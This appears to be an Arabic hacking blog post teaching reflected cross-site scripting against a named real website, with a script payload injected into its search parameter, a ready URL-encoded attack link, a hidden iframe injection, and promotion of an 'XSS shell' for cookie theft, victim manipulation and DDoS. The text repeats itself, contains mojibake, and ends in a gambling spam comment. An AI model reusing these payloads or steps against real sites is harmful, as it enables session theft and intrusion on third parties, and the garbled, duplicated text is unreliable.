- Unknown
- 4:29 ص
- hacker ، new
- 1 تعليق واحد
بسم الله الرحمن الرحيم
الكود المهم في ثغرات xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً
في ثغرات
هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
يحتوي على اليوزر نايم و الباسوورد المشفرmd5
مثلا ناخذ هذا الموقع
https://www.calacademy.org
وريح يكون استغلال مثلا بشكل هذا https://www.calacademy.org/search.php?q=
الكود هذا نحطو في اخير بعد العلامة (=)
نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب <script>alert(document.cookie)</script><script>alert("XSS")</script>
المهم يصبح هيك
https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
الكود المهم في ثغرات xss
كود:
<script>alert(**************)</script><script>alert("XSS")</script>
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً
في ثغرات
هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
يحتوي على اليوزر نايم و الباسوورد المشفرmd5
مثلا ناخذ هذا الموقع
https://www.calacademy.org
وريح يكون استغلال مثلا بشكل هذا https://www.calacademy.org/search.php?q=
الكود هذا نحطو في اخير بعد العلامة (=)
نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب <script>alert(document.cookie)</script><script>alert("XSS")</script>
المهم يصبح هيك
https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن اكواد برمجية ) , لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من التعامل مع هذه الثغرات باحترافية اكثر .
1 – تلغيم الصفحة .
وهنا سيتم حقن اكواد HTML لاضافة صفحة خفية ملغومة في داخل الموقع ( الصفحة ) المصاب
كود:
<html>
<iframe name=”I1″ src=”https://www.calacademy.org/server.html” marginwidth=”1″ marginheight=”1″ height=”1″ width=”1″ scrolling=”no” border=”0″ frameborder=”0″>
</iframe>
</iframe></p>
</html>
نسخه من شل G.H.T-XSS -Shell
G.H.T Xss طھط*ظ…ظٹظ„ â—ڈ ظ…ط±ظƒط² طھط*ظ…ظٹظ„ ط´ط¨ظƒط© ط§ظ„طµط§ط¹ظ‚ط© ط§ظ„ط¹ط±ط¨ظٹط©
عدلو علية قبل رفع
خطورتها :
1- سحب الكوكيز
2- تنفيذ اوامر Java script
3- التلاعب بالضحية
4- عمل DDos Attack.
========================
الاحتياجات :
1- G.H.T Xss Shell
2- asp استضافة تدعم https://hosting.parking.ru/signup.aspx
3- برنامج ftp
4- موقع للتلغيم
Harrah's Resort SoCal: 2021 Review - Oklahoma Casinos
ردحذفCome 검증사이트목록 check out our full 2021 review of Harrah's Resort SoCal. Learn all 이스포츠 about 이 스포츠 its 먹튀신고 slot machines, poker 슬롯 가입 쿠폰 tables, and other amenities.